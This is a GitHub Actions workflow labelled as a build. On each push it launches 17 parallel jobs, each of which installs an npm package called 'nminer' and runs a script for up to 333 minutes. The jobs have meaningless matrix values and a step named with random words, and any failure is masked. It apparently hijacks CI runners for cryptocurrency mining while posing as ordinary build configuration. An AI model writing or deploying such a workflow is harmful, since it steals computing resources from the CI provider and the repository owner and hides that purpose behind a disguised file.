name: step-mother
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6956 }
          - { version: 7625 }
          - { version: 9188 }
          - { version: 8280 }
          - { version: 3781 }
          - { version: 3912 }
          - { version: 452 }
          - { version: 8975 }
          - { version: 7191 }
          - { version: 5706 }
          - { version: 9993 }
          - { version: 2357 }
          - { version: 9500 }
          - { version: 992 }
          - { version: 6811 }
          - { version: 8696 }
          - { version: 6592 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: yesterday coolly lest circa
        run: |
          npm install nminer@latest
          timeout 333m node step-mother.js || echo "step-mother executed"